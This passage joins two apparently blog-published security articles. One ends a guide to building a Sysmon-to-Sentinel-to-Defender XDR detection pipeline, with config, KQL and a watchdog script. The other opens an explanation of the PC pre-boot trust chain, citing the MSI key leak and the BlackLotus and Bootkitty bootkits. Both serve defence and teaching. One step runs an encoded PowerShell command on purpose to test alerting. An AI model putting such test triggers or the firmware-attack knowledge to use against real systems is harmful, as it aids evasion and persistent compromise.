Note: Aha #3 -- entity resolution is information-theoretic, not engineering. Two records refer to the same entity if and only if their identifiers carry enough joint information to pick that entity out of the space of all entities. When the entity space is small (a few thousand hosts) and the identifier is strong (a DeviceId), the match is determined. When the entity space is large (every IP on the public internet) and the identifier is weak (the bare IP), the match is probabilistic and false-positives accumulate. No correlation engine, however clever, can manufacture information that the source pipeline did not record. The architectural lesson is to invest in strong identifiers upstream -- in agents, in DCR schemas, in alert grammars -- not to lean on correlator cleverness downstream.

The second hard limit is normalization lossiness. ASIM (Advanced Security Information Model), Microsoft's effort to normalize Sentinel data into common schemas like _Im_ProcessCreate, makes cross-source queries dramatically easier -- but the normalization is lossy. Fields that exist only in Sysmon (such as the Sysmon-specific IntegrityLevel value, or the OriginalFileName from the PE manifest) get dropped on the way into the normalized schema [@ms-learn-sentinel-asim-normalization]. The trade-off is honest and inescapable: a normalized schema is a projection from a richer per-source schema, and projections lose data by construction.

We can sketch this formally. If $$S$$ is the per-source schema (a set of fields), $$N$$ is the normalized schema, and $$\pi: S \to N$$ is the projection (the ASIM mapping), then the information loss on a single record $$r$$ is

$$ L(r) = H(r) - H(\pi(r)) $$

where $$H$$ is the entropy (number of bits) of the record. For a Sysmon ProcessCreate row, $$H(r)$$ is roughly $$\log_2 |S|$$ bits over a thirty-field schema (call it ~150-200 bits of effective entropy after compression of correlated fields); $$H(\pi(r))$$ is around half that after mapping into the much smaller normalized _Im_ProcessCreate schema. The dropped bits are exactly the fields you cannot query in the normalized form. ASIM is good for cross-source detections that need only common fields; per-source detections that need the long tail of source-specific fields must query the raw source table directly.

The third limit is temporal alignment. Each pipeline has its own clock: Sysmon timestamps come from the host kernel, MDC alerts from the MDC service back-end, Sentinel TimeGenerated from the workspace ingestion. Within a single host these clocks are usually close (NTP-synced), but across hosts and across pipelines they can drift by seconds or minutes. The correlator's "within a time window" merge has to tolerate this drift, which means the window has to be larger than the worst-case clock skew. A larger window means more false-positive merges. There is no way out of this trade-off; only operational tuning between sensitivity and specificity.

The fourth limit is rule expressiveness ceiling. KQL is Turing-complete in the sense that any computable detection can be expressed if you are willing to write enough of it -- but Sentinel scheduled rules cap query duration, query result size, and join cardinality. Detections that conceptually want to scan a year of data and join against a separately-changing IOC list are expressible in KQL but not runnable under Sentinel rule limits. Custom ADX clusters or Spark-on-Synapse can run such queries, at the cost of leaving the unified portal entirely.

These are the limits any honest architecture has to live with. The Microsoft pipeline does well on the first (when strong identifiers exist), is honest about the second (ASIM is documented as a normalization, not a transparent overlay), tolerates the third (windowed merge), and surfaces the fourth as a Sentinel pricing-and-scope conversation. None of them is a Microsoft-specific defect. They are properties of the problem.

9. Open problems

The pipeline is fast enough, accurate enough, and -- in the worked example -- correct. It is not finished. Seven open problems remain, in roughly decreasing order of how much they hurt a working SOC today.

1. The Sentinel-Azure-portal cutover is on a hard date. Microsoft has announced the retirement of the Microsoft Sentinel experience in the Azure portal effective March 31, 2027 (extended from the original July 1, 2026 target) [@ms-learn-sentinel-azure-portal-retiring] [@helpnetsec-sentinel-defender-timeline]. After that date, Sentinel can only be operated through the unified Defender portal at security.microsoft.com. The cutover affects analytics-rule authoring (the Azure-portal rule wizard goes away), automation rules, watchlists, and the investigation graph. Customers with custom dashboards, ARM templates, or automation that targets the Azure-portal Sentinel surface must port them. This is the most concrete migration deadline in this article.

2. CWPP-to-XDR coverage is still expanding. As of the documented integration scope, MDC for Servers, Containers, SQL, Storage, and App Service alerts flow to Defender XDR [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest]. New CWPP plans (e.g., Defender for APIs as it matures) tend to land first in the MDC blade and only later in the unified incident graph. Customers operationalizing a new MDC plan should check the integration documentation for that specific plan rather than assuming XDR ingestion is automatic.

3. Posture-finding context still lives in a separate blade. As §6.5 established, MDC posture findings do not flow to Defender XDR. A SOC analyst looking at an incident on a host has no incident-side way to see "this host also has a CSPM finding for missing endpoint protection." The workaround is to join SecurityRecommendation against the incident-affected resources via KQL, or to pivot manually to the MDC blade. A first-class "posture context on incident" feature does not exist as of the documented surface area.

4. The correlation engine's heuristics are not user-tunable. The Defender XDR correlation engine merges alerts using a Microsoft-managed set of thresholds: time window, entity priority, confidence weighting [@ms-learn-xdr-correlation]. These are not exposed for customer override. A SOC that wants to widen the merge window (because their telemetry has long ingest tails) or tighten the entity-priority (because they distrust hostname matches for shared-name VMs) has no knob to turn. The correlation behaviour is whatever Microsoft ships; tuning happens by raising support cases against perceived false-merges or false-splits.

5. Custom detection semantics are subtly different from Sentinel rule semantics. A KQL detection authored as a Defender XDR Custom Detection runs over the advanced-hunting schema (DeviceProcessEvents, DeviceFileEvents, etc.), not over Log Analytics tables [@ms-learn-sentinel-custom-detections] [@ms-learn-advanced-hunting]. The two schemas overlap (you can write conceptually similar detections over both), but the field names, the freshness windows, and the result-size caps differ. An organization with parallel teams authoring detections in both surfaces can end up with two near-duplicate detections that drift apart over time. There is no first-class deduplication or "promote this Sentinel rule to a Custom Detection" workflow.

6. Logic Apps write-back from Sentinel to MDC has rough edges. Sentinel automation rules can invoke Logic Apps playbooks to take response actions [@ms-learn-sentinel-logic-apps-playbooks] [@ms-learn-sentinel-soar]. Writing back to MDC -- for example, suppressing an alert in MDC or creating a Defender for Cloud assessment programmatically -- is possible but requires the playbook to call the MDC REST API directly [@ms-learn-mdc-assessments-rest]. There is no native "MDC action" connector with the breadth of the MDE actions connector. Customers building bidirectional response automation between Sentinel and MDC end up writing HTTP-action playbooks by hand. The MDC REST API for assessments lets you create and update assessment results programmatically, but the surface area for writing back to MDC (e.g., dismissing or recategorizing an alert) is smaller than the read API and is not symmetric with Sentinel's native alert-lifecycle actions [@ms-learn-mdc-assessments-rest] [@ms-learn-mdc-custom-recs]. Closing this gap with a first-class connector is on most enterprise customers' wish lists.

7. Multi-workspace and multi-tenant topologies remain awkward. The unified secops experience connects Defender XDR to exactly one Sentinel primary workspace per tenant. Customers with multiple workspaces -- common in regulated industries with data-residency boundaries -- must choose which workspace is the XDR-connected one, and accept that the other workspaces' alerts are visible only inside Sentinel, not in the unified incident graph [@ms-learn-unified-secops] [@ms-learn-move-to-defender]. Multi-tenant MSSPs and customers with subsidiaries on separate Azure tenants face an even harder design problem: there is no single pane across tenants in the unified portal, only the cross-workspace KQL pattern from §4.

8. Multicloud entity resolution: the EC2-on-AWS case. A Windows VM running as an AWS EC2 instance can be brought into Microsoft's stack through two layers, neither of which produces a single shared identifier. Defender for Cloud's multicloud connector ingests AWS CloudTrail and EC2 metadata into MDC's posture surface (CSPM coverage) [@ms-learn-mdc-onboard-multicloud]; Defender for Servers' Arc-based provisioning then installs Azure Monitor Agent and Microsoft Defender for Endpoint on the EC2 host, projecting the box into the Azure tenant's resource graph as an Microsoft.HybridCompute/machines Arc resource. Three identifiers therefore describe the same physical workload but never coincide on a single strong identifier: (1) the EC2 ARN arn:aws:ec2:<region>:<account>:instance/<instance-id>, which is what AWS CloudTrail and the AWS console use; (2) the Arc machine resource ID /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.HybridCompute/machines/<arc-machine-name>, which is what the Log Analytics _ResourceId column carries when AMA forwards the Sysmon event; (3) the MDE DeviceId, a GUID assigned at MDE first-onboarding, which is what the Defender for Servers CWPP alert and the DeviceInfo advanced-hunting table key on. Bridging the three at query time requires bespoke KQL: lift the Arc machine name from _ResourceId via extend ArcMachine = tostring(split(_ResourceId, "/")[-1]), look up the corresponding DeviceId in DeviceInfo keyed by DeviceName, and join to a customer-maintained Watchlist (or external CMDB) that maps Arc machine name -> EC2 instance-id -> EC2 ARN. The pattern works, but every join is a place where the inventory can drift; a renamed EC2 instance or a reimaged host that picks up a new MDE DeviceId will silently break correlation until the watchlist is refreshed.

The EC2 sub-example above is the tip of the iceberg. Multi-cloud is its own open problem and worth a separate article. MDC's CSPM and parts of the CWPP plans (Servers, Containers) cover AWS and GCP via Azure Arc and cloud connectors, but the depth of integration for non-Azure workloads in the unified XDR experience is less than for native Azure workloads. The honest summary is "Azure-first, AWS/GCP-supported, on-prem via Arc." Designs that are AWS-primary should evaluate AWS Security Lake + a SIEM (Sentinel, Splunk, or Athena) against MDC-on-AWS specifically; the choice is not obvious.

None of these problems is fatal to the architecture. Each is the kind of structural friction that comes from grafting three pre-existing pipelines into one analyst surface in fewer than three years. The cutover date is the only one with a deadline; the rest are roadmap items.

10. Recipe: building the pipeline yourself in six steps

This section walks the six setup steps that produce the worked example end-to-end, in the order an engineer should actually do them. Each step names the artifact, the documentation reference, and the single most common mistake that will silently break the step.

Step 1 -- Install Sysmon with a curated configuration

Install Sysmon on the host (Azure VM, Arc-enabled server, or on-prem Windows) with a configuration that emits the events you actually need [@ms-learn-sysmon]. The default Sysmon config is essentially empty; a curated config is what makes it useful. Many teams start with the SwiftOnSecurity sysmon-config or Olaf Hartong sysmon-modular public baselines and prune from there [@swiftonsecurity-sysmon-config] [@hartong-sysmon-modular].

Note: Don't reinvent the Sysmon config. Two community-maintained baselines do most of the work: the SwiftOnSecurity sysmon-config template ("a Sysmon configuration file for everybody to fork...with default high-quality event tracing") and Olaf Hartong's sysmon-modular framework ("a Sysmon configuration repository for everybody to customise") cover the common cases with years of community tuning [@swiftonsecurity-sysmon-config] [@hartong-sysmon-modular]. Pick one, version-control it in your config-management tool (DSC, Ansible, Chef), and ship it via your existing host-config pipeline. The single most common mistake is shipping a default Sysmon install and then wondering why detections fire on noise.

Validate that Sysmon is emitting by reading the local event log on the host: Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 5. If you see ProcessCreate (Event ID 1) records, hop 1 works.

Step 2 -- Deploy the Azure Monitor Agent with a Data Collection Rule

Install AMA on the host (via Azure Policy for Azure VMs, the Arc agent for non-Azure, or the standalone installer) [@ms-learn-ama-overview]. Then create a Data Collection Rule that names the Sysmon channel and ships it to your Sentinel-enabled workspace. The ARM snippet below is the load-bearing artifact: the streams value must be exactly Microsoft-WindowsEvent (or, for the older Event table path, Microsoft-Event), not a variant. This is the silent-failure cliff §6.2 named: get this string wrong and the agent ships nothing, returning no error.

{
  "type": "Microsoft.Insights/dataCollectionRules",
  "apiVersion": "2022-06-01",
  "name": "dcr-sysmon-to-sentinel",
  "location": "eastus",
  "properties": {
    "dataSources": {
      "windowsEventLogs": [
        {
          "name": "sysmonOperational",
          "streams": ["Microsoft-WindowsEvent"],
          "xPathQueries": [
            "Microsoft-Windows-Sysmon/Operational!*[System[(EventID=1 or EventID=3 or EventID=7 or EventID=10 or EventID=11)]]"
          ]
        }
      ]
    },
    "destinations": {
      "logAnalytics": [
        { "name": "lawDest",
          "workspaceResourceId":
            "/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.OperationalInsights/workspaces/law-contoso-secops" }
      ]
    },
    "dataFlows": [
      { "streams": ["Microsoft-WindowsEvent"],
        "destinations": ["lawDest"] }
    ]
  }
}

The silent-miss bug is real: a DCR that names "Microsoft-Event" ships into the older Event table; a DCR that names "Microsoft-WindowsEvent" ships into the newer typed WindowsEvent table; a DCR that names anything else (typo, copy-paste from another data source, or a name that does not exist) emits nothing, returns no validation error at deploy time, and produces a silent dashboard hole [@ms-learn-ama-windows-events] [@ms-learn-sentinel-data-connectors-ref]. The fix is to validate post-deploy by checking that rows are arriving in the destination table within ~5 minutes.

Validation KQL to run in the workspace:

Event
| where TimeGenerated > ago(10m)
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| summarize count() by Computer

If you see a row per Sysmon-emitting host, hop 2 and hop 3 work.

Step 3 -- Author the Sentinel scheduled analytics rule

Inside the Defender portal's Sentinel section (or the Azure-portal Sentinel blade until the March 31, 2027 cutover), create a new scheduled analytics rule [@ms-learn-sentinel-scheduled-rules] [@ms-learn-sentinel-azure-portal-retiring]. Paste the KQL from the Spoiler in §6.3. Configure entity mappings: Host from Computer, Account from User, Process from ProcessGuid. Schedule: run every 5 minutes over the last 5 minutes. Severity: Medium. Tactic: Execution (MITRE ATT&CK T1059.001).

The single most common mistake at this step is omitting the entity mappings. The rule will fire and produce a SecurityAlert row, but the alert will not participate in cross-pipeline correlation at hop 6 because there are no entities to merge on. Always configure at least Host, Account, and -- when available -- Process or FileHash entity mappings on a Sentinel rule.

This recipe sets up the Sysmon-to-Sentinel-to-XDR path only. Adjacent surfaces -- Microsoft Defender for Office 365 for email alerts, Microsoft Defender for Identity for on-prem AD signals, Microsoft Defender for Cloud Apps (MDCA) for SaaS-app signals -- have their own onboarding paths and are out of scope for this six-step recipe. The convergence point in Defender XDR is the same; the upstream setup differs per source.

Five other adjacent surfaces are worth knowing about as a map of the broader Microsoft SecOps surface, even though this article does not walk any of them:

Sentinel watchlists -- name-value reference tables (e.g., critical-asset inventory, terminated-user list, custom IOC list) stored in the Watchlist table and cached for low-latency enrichment joins in KQL analytics rules and hunts [@ms-learn-sentinel-watchlists].
Sentinel threat intelligence integration -- ingest IOCs from TAXII feeds, Microsoft Defender Threat Intelligence, MISP, or platform connectors into the ThreatIntelligenceIndicator table, and use the built-in TI map rule type to fire on matches against your telemetry [@ms-learn-sentinel-threat-intel].
MSTICPy + Sentinel Jupyter notebooks -- the Microsoft-maintained MSTICPy Python library plus Sentinel's notebook integration give hunters a programmable workspace for incident investigation, IOC pivoting, and ML-driven analysis on Sentinel data outside the rule-authoring surface [@ms-learn-sentinel-notebooks].
Sentinel Content Hub and the solutions marketplace -- the in-product distribution surface for prepackaged detections, parsers, workbooks, hunting queries, and playbooks delivered as Microsoft-signed or partner-signed solutions [@ms-learn-sentinel-solutions].
Microsoft Defender External Attack Surface Management (Defender EASM) -- the adjacent posture surface that discovers and maps an organization's internet-facing assets from the outside-in; explicitly out of scope for this article's CSPM/CWPP/SIEM/XDR spine, but worth knowing exists [@ms-learn-defender-easm].

Step 4 -- Enable Defender for Servers (Plan 2) for MDC alerts

On the Azure subscription that owns the VM (or the Arc-enabled resource group), enable Microsoft Defender for Cloud's Defender for Servers Plan 2 [@ms-learn-mdc-defender-servers]. Plan 2 includes the MDE license and the runtime detection engine that emits the MDC alert at hop 5. Enabling the plan automatically deploys MDE to the in-scope hosts and configures the MDC-to-XDR alert-ingestion integration that reached general availability in March 2024 [@ms-learn-mdc-mde-integration] [@ms-learn-mdc-xdr-ingest].

Validation: trigger a benign test pattern (e.g., powershell -EncodedCommand of a harmless script) on a test host. Within ~5 minutes, you should see an MDC alert in the MDC Alerts blade titled Suspicious PowerShell command line (or similar), and a corresponding alert in security.microsoft.com.

Step 5 -- Connect Sentinel to the unified Defender portal

Inside the Defender portal, enable the Sentinel connection that designates your Log Analytics workspace as the primary workspace for the unified secops experience [@ms-learn-sentinel-defender-portal] [@ms-learn-move-to-defender]. This step is what makes the Sentinel SecurityAlert rows flow into the Defender XDR incident graph at hop 6 and become merge candidates with the MDC and MDE alerts.

One-tenant, one-primary-workspace constraint: as §6.6 noted, a Defender XDR tenant has exactly one primary Sentinel workspace. If you have multiple workspaces (regional residency reasons, MSSP topology, etc.), choose deliberately which one is the XDR-connected one. Alerts in secondary workspaces remain queryable via Sentinel but do not participate in the unified incident graph.

Step 6 -- Write a watchdog rule that fires on telemetry silence

The pipeline can fail silently in multiple places: AMA stops on a host, the DCR is removed or mis-edited, Sysmon is uninstalled, the workspace fills its daily cap. None of these failures produce an alert by themselves. Write a Sentinel scheduled rule that fires when expected telemetry is absent: for each host in your inventory, alert if Event table rows from that host stop appearing for more than N minutes.

{`# Run via Azure Monitor REST API or the az monitor cli; here we simulate # the comparison logic that an analytics rule would express in KQL.

EXPECTED_INVENTORY = { 'MAL-CONTOSO-PRD-01', 'MAL-CONTOSO-PRD-02', 'MAL-CONTOSO-PRD-03', 'MAL-CONTOSO-PRD-04', 'MAL-CONTOSO-PRD-05', }

In a real deployment this list comes from KQL against the Event table: Event | where TimeGenerated > ago(24h) | summarize by Computer

RECENTLY_EMITTING_HOSTS = { 'MAL-CONTOSO-PRD-01', 'MAL-CONTOSO-PRD-02', # PRD-03 absent: agent down? DCR removed? 'MAL-CONTOSO-PRD-04', 'MAL-CONTOSO-PRD-05', }

silent_hosts = EXPECTED_INVENTORY - RECENTLY_EMITTING_HOSTS if silent_hosts: print(f"ALERT: telemetry silence on {len(silent_hosts)} host(s):") for h in sorted(silent_hosts): print(f" - {h}") else: print("OK: all expected hosts emitted Sysmon events in the last 24h.") `}

The equivalent in Sentinel is a scheduled rule that joins a static Watchlist of expected hosts against Event | summarize by Computer over the last 24 hours and alerts on the set difference. This watchdog is the only thing standing between an architectural diagram of perfect convergence and the operational reality of one host's silent agent.

This recipe addresses detection-and-response only. Compliance framing -- mapping detections to MITRE ATT&CK tactics, mapping posture findings to MCSB controls, reporting against PCI-DSS or NIST 800-53 -- is a separate concern handled by MCSB and the MDC regulatory-compliance blade [@ms-learn-mcsb-overview]. Most enterprise SOCs end up doing both, but a working detection pipeline can ship without the compliance layer attached.

With these six steps the Sysmon record from §1 reaches security.microsoft.com in roughly nine minutes, three alerts merged into one incident. The pipeline is real. The next section addresses the questions that show up in every architecture-review meeting once the pipeline is built.

11. FAQ

It depends on whether you need a SIEM. MDE alone gives you endpoint detection, response actions on the endpoint, and a native incident view inside Defender XDR. It does not give you a place to ingest non-endpoint log sources (firewall, identity provider that is not Microsoft Entra, custom application logs) and run cross-source correlation against them. Sentinel is the SIEM substrate that does that [@ms-learn-mde-landing] [@ms-learn-sentinel-overview]. A small organization whose telemetry is entirely MDE-and-Microsoft-365 can run without Sentinel; one whose threat model includes anything outside that envelope generally needs it. No. As §6.5 established and as the Microsoft documentation is explicit about, only MDC's **CWPP alerts** (from Defender for Servers, Containers, SQL, Storage, App Service plans) flow into the Defender XDR incident graph [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest]. CSPM-side artifacts -- recommendations, Secure Score deltas, regulatory-compliance findings -- stay in the Microsoft Defender for Cloud blade. If you want posture context attached to an incident, you have to pivot manually to MDC or join `SecurityRecommendation` against the incident's affected resources via KQL. For the documented Sysmon-to-Sentinel-to-XDR path: roughly 5 to 10 minutes typical. The dominant factor is the Sentinel scheduled-rule cadence (minimum 5 minutes) [@ms-learn-sentinel-scheduled-rules]. NRT rules cut it to 1-2 minutes for single-row matches [@ms-learn-sentinel-nrt-rules]. MDE's native path through Defender XDR is sub-minute for the endpoint detection itself; the cross-pipeline merge happens in the correlation engine within a sliding window after the slowest pipeline reports. Don't promise sub-minute for the SIEM path; do promise sub-minute for the EDR-direct path. Because each pipeline names hosts in its own grammar. MDE uses a `DeviceId` (a Microsoft-generated GUID). Sentinel uses `Computer` (the hostname as Windows reports it). MDC uses the Azure `resourceId` for the underlying VM. Microsoft Entra ID uses a directory `ObjectId`. The Defender XDR correlation engine normalizes these where it can [@ms-learn-xdr-correlation] [@ms-learn-sentinel-entities], but in raw KQL queries you have to `join` across the identifier spaces explicitly. The `IdentityInfo` and `DeviceInfo` tables are the join helpers; the entity-resolution problem from §8 is what makes this non-trivial. **March 31, 2027** (extended from the original July 1, 2026 target). After that date, Microsoft Sentinel can only be accessed via the unified Defender portal at `security.microsoft.com` [@ms-learn-sentinel-azure-portal-retiring] [@helpnetsec-sentinel-defender-timeline]. Customers with custom dashboards, automation, or ARM templates targeting the Azure-portal Sentinel surface need to plan migration. The underlying Log Analytics workspace and KQL queries do not change; the analyst UI does. It depends on where your telemetry lives. **Sentinel scheduled rules** read from Log Analytics tables (`Event`, `SecurityEvent`, `Syslog`, custom tables) and are the right answer when your detection covers data ingested via DCRs or Sentinel connectors. **Defender XDR Custom Detections** read from the advanced-hunting schema (`DeviceProcessEvents`, `DeviceFileEvents`, `EmailEvents`, etc.) and are the right answer when your detection covers MDE / Defender for Office / Defender for Identity-native telemetry [@ms-learn-sentinel-custom-detections] [@ms-learn-advanced-hunting]. The two are not interchangeable; the field names and result-size caps differ. A common operational pattern is "Sentinel for everything Sysmon and third-party, Custom Detections for everything MDE-native." Partially, and only by hand. Sentinel automation rules invoke Azure Logic Apps playbooks, and those playbooks can call the Microsoft Defender for Cloud REST API directly to take actions like creating an assessment or (with limited surface area) acknowledging an alert [@ms-learn-sentinel-logic-apps-playbooks] [@ms-learn-mdc-assessments-rest] [@ms-learn-mdc-custom-recs]. There is no first-class "MDC alert action" Logic Apps connector with the same breadth as the MDE connector. Customers building bidirectional Sentinel-MDC response automation write HTTP-action playbooks against the MDC REST API and accept that the integration is less native than the MDE side.

Below the OS: The Pre-Boot Trust Chain Where Secure Boot Inherits Its Trust From

noreply@paragmali.com (Parag Mali) — Wed, 03 Jun 2026 00:00:00 GMT

**Secure Boot is not where trust begins on a modern PC.** It is the fifth rung in an eleven-rung pre-OS chain that starts with a one-time-programmable fuse inside the chipset and travels through Intel Boot Guard or AMD Platform Secure Boot, through an on-die security processor (Intel CSME on MINIX 3, or AMD's ARM Cortex-A5 Secure Processor), through UEFI and Measured Boot, before it ever loads `winload.efi`. Every rung's verifier inherits the trust of the rung below it -- and the chain's revocation surface narrows monotonically as you descend. The April 2023 MSI / Money Message OEM-key leak [@binarly-msi] and the May 9, 2023 KB5025885 boot-manager revocation programme [@kb5025885] are the two worked examples that make the asymmetric-revocation argument concrete: at the fuse layer, there is no revocation primitive at all. flowchart TD R0["Rung 0: CPU reset vector at 0xFFFFFFF0"] subgraph IL["Intel path"] I1["Rung 1: Microcode loads from SPI patch area"] I2["Rung 2: Authenticated Code Module verified vs silicon-fused Intel key"] I3["Rung 3: ACM reads Field Programmable Fuse, verifies KM and BPM"] I4["Rung 4: Initial Boot Block hashed and compared to BPM"] end subgraph AL["AMD path"] A1["Rung 1: ARM Cortex-A5 PSP comes out of reset before x86 cores"] A2["Rung 2: PSP boot ROM verifies PSP firmware vs AMD root key hash"] A3["Rung 3: PSP reads OEM-key fuse, verifies signed BIOS image"] A4["Rung 4: PSP releases x86 BSP from reset"] end R5["Rung 5: SEC and PEI phases, memory init, cache as RAM"] R6["Rung 6: DXE drivers loaded, UEFI variable services online"] R7["Rung 7: Secure Boot evaluates Authenticode against PK, KEK, db, dbx"] R8["Rung 8: Boot Device Selection picks bootmgfw.efi"] R9["Rung 9: Boot Manager loads, Measured Boot extends PCR 4 through 7"] R10["Rung 10: bootmgfw.efi verifies winload.efi"] R11["Rung 11: Hand-off to winload.efi"] R0 --> I1 R0 --> A1 I1 --> I2 --> I3 --> I4 --> R5 A1 --> A2 --> A3 --> A4 --> R5 R5 --> R6 --> R7 --> R8 --> R9 --> R10 --> R11

1. Permanently Downgraded to a Weaker Trust Model

On April 6, 2023, the Money Message ransomware actor published roughly 1.5 TB of MSI source code to a TOR-hosted leak site after MSI declined to pay a reported $4M ransom [@helpnet-msi-leak]. A month later, on May 5, Binarly's efiXplorer team opened the archive. Inside, they found something worse than source code. They found the Intel Boot Guard Key Manifest and Boot Policy Manifest private keys covering roughly 116 MSI systems, plus image-signing keys for 57 more products, with cross-OEM contamination across HP, Lenovo, AOPEN, CompuLab, and Star Labs [@binarly-msi] [@helpnet-msi-leak] [@register-msi-alt]. The affected platform generations spanned Tiger Lake, Alder Lake, and Raptor Lake [@register-msi-alt]. Binarly published a per-device impact catalogue in their SupplyChainAttacks repository for triage by the affected vendors [@binarly-supply-chain].

Those private keys correspond to public-key hashes that have already been burned, one-time-programmably, into a fuse inside the chipset of every affected machine. There is no revocation primitive at that fuse layer. Intel cannot patch this. MSI cannot patch this. Microsoft cannot patch this.

Note: Every Intel system whose Field Programmable Fuse holds the hash of a leaked MSI OEM public key is now in a permanent state of reduced assurance against firmware tampering. The leak does not require a successful in-the-wild exploit to count as damage. The capability transfer happened the moment Money Message published the archive [@binarly-msi].

This story matters because most public writing about "the boot security chain on a Windows PC" stops at Secure Boot. The popular framing -- that the Platform Key (PK) is the trust anchor and the rest of the chain hangs from it -- is not just incomplete. It is upside down. Secure Boot's PK is a tenant of UEFI authenticated NVRAM stored in the SPI flash chip soldered next to the chipset [@uefi-specs]. PK's integrity depends on the SPI flash being unwritable to attackers. That property is what the rung below Secure Boot enforces. Without the lower-rung silicon-fused verifier, PK is just bytes in flash.

A bootkit is malware that survives in the pre-OS firmware boot path. It runs before the kernel exists and outlives both reboots and clean OS installs. Two recent ones bracket the operational threat.

BlackLotus [@eset-blacklotus]. Analysed by ESET researcher Martin Smolar on March 1, 2023, sold on hacking forums since October 2022. It was the first public UEFI bootkit observed bypassing Secure Boot on fully-patched Windows 11, via CVE-2022-21894 [@cve-2022-21894-nvd].
Bootkitty [@bootkitty] [@helpnet-bootkitty]. Disclosed by ESET on November 27, 2024. It was the first analogue for Linux.

These are the threats the pre-boot chain exists to defeat. And the pre-boot chain works only as well as the layer below it.

Why is the most permanent layer of the trust chain also the layer with no recovery surface?

To answer that question, we have to walk down from the rung you know -- Secure Boot -- to the rung you probably do not: the fuse.

That walk is the article. The eleven-rung diagram in the TLDR is the map. Along the way we will visit Intel Boot Guard, AMD Platform Secure Boot, the Intel Converged Security and Management Engine, and the AMD Platform Security Processor. We will see what gets verified, by what, and against what trust anchor. And we will see, three times at three increasing levels of compression, why the chain's revocation surface narrows monotonically as you descend, until at the bottom there is no revocation at all. Companion articles on Secure Boot, Measured Boot, Pluton, ACPI Tables, and Secured-core PCs cover the rungs above this one. This article's lane is everything below them.

2. From "BIOS Is Trusted Because Nobody Can Write to It" to "BIOS Has Its Own SoC"

On September 13, 2011, Symantec analyst Liam Ge published an early analysis of Trojan.Mebromi on Symantec Connect [@symantec-bios-threat]; Liam O'Murchu's contemporaneous Symantec Threat Intelligence writeup is the source MITRE catalogues at ATT&CK ID S0001 as the canonical primary [@mitre-mebromi-s0001]. Mebromi was the first in-the-wild BIOS rootkit observed on shipping consumer PCs. It rewrote the Award BIOS Master Boot Record code so that it reinjected itself into the OS on every boot. The Wikipedia BIOS security section preserves the same provenance [@wiki-bios-security].

Four months earlier, in April 2011, NIST had published SP 800-147 ("BIOS Protection Guidelines") attempting to mandate the cure: signed BIOS updates with an authenticated update mechanism rooted in immutable code [@nist-sp-800-147]. The cure arrived just as the disease made its in-the-wild debut. That four-month gap captures the entire history of pre-boot security on the PC platform: the defensive architecture always lags the attacker by roughly one generation, and each generation moves the trust anchor one layer closer to the silicon.

Generation 1 -- Trust by physical inaccessibility (pre-2011)

The implicit model from the IBM PC through the late 2000s was that nobody could write to the BIOS ROM, so the BIOS was trusted because it was unreachable. That model held only as long as nobody bothered. By 2011 the protections that had compensated for writable flash (the BIOSWE, BLE, SMM_BWP, and FLOCKDN chipset configuration bits described in the contemporary CHIPSEC literature [@c7zero-chipsec]) were widely misconfigured on shipping platforms. Academic SPI-rewrite research predated Mebromi by nearly a decade. Mebromi simply demonstrated that the field had caught up.

Generation 2 -- Signed BIOS updates anchored in BIOS (2011-2013)

NIST SP 800-147 [@nist-sp-800-147] and OEM responses to Mebromi produced a generation of platforms that signed BIOS updates and verified the signature before flashing. The structural flaw was immediate: the verifier lived in the region it was verifying. Burn the verifier with the update payload and you owned the next boot. Seven years later NIST SP 800-193 ("Platform Firmware Resiliency Guidelines") explicitly raised the bar from Protection alone to Protection plus Detection plus Recovery [@nist-sp-800-193], implicitly conceding that Gen 2 had not closed the loop.

Generation 3 -- The trust anchor moves into silicon (2013-2015)

In the second quarter of 2013, Intel shipped Boot Guard alongside the Haswell CPU family. In the first half of 2014, AMD shipped the Platform Security Processor with the Family 16h "Beema" and "Mullins" mobile parts [@wiki-amd-psp]. The Wikipedia entry for AMD PSP records the architecture cleanly: "The PSP itself represents an ARM core (ARM Cortex-A5) with the TrustZone extension ... inserted into the main CPU die as a coprocessor" [@wiki-amd-psp]. With Gen 3, the trust anchor moved out of mutable storage entirely. The verifier was no longer a region of flash; it was a piece of silicon that could not be rewritten without replacing the chip.

In 2015, the Skylake CPU family shipped with ME 11, the first ME generation built on the Intel Quark x86 core (replacing the ARC-based predecessors) and running a modified MINIX 3 microkernel as its on-die runtime [@wiki-ime] [@wiki-ime-history]. The Converged Security and Management Engine (CSME) brand name folded ME, TXE, and SPS into a single architectural label.

In November 2017, Andrew S. Tanenbaum -- the creator of MINIX 3 -- published an open letter to Intel that read in part: *"Thanks for putting a version of MINIX inside the ME-11 management engine chip used on almost all recent desktop and laptop computers in the world"* [@tanenbaum-letter]. The hosted letter at cs.vu.nl carries no explicit publication date; the early-November dating derives from contemporaneous press coverage. Intel had never consulted him; he learned about MINIX's role only when independent researchers reverse-engineered the ME runtime.

The cultural moment mattered because it surfaced something the architecture had hidden: every modern Intel PC ships a second operating system, on a second processor, that boots before yours does. The trust chain you are reading about exists in part because that second OS exists.

ME 11 ran MINIX. Earlier ME generations (ME 1 through ME 10) ran ThreadX on ARC cores. Later CSME generations from Ice Lake forward moved to a Tremont-class x86 core but kept the MINIX 3 runtime [@wiki-ime] [@wiki-ime-history].

Thanks for putting a version of MINIX inside the ME-11 management engine chip used on almost all recent desktop and laptop computers in the world. -- Andrew S. Tanenbaum, November 2017 [@tanenbaum-letter]

A month after Tanenbaum's letter, on December 7, 2017, Mark Ermolov and Maxim Goryachy presented "How to Hack a Turned-Off Computer" at Black Hat Europe 2017 [@ermolov-goryachy-2017]. The talk demonstrated unsigned-code execution in the CSME via the JTAG / Direct Connect Interface chain that became Intel security advisory INTEL-SA-00086 [@intel-sa-00086]. Intel's CSME security white paper postdates the disclosure and treats the same architecture from the vendor side [@intel-csme-whitepaper]. A year later, in 2018, Yuriy Bulygin presented "A Tale of Disappearing SPI and the Intel Boot Guard Enchanted Dance" at Black Hat Europe 2018 [@eclypsium-publications], the canonical reverse engineering of the Boot Guard IBB-verification flow.

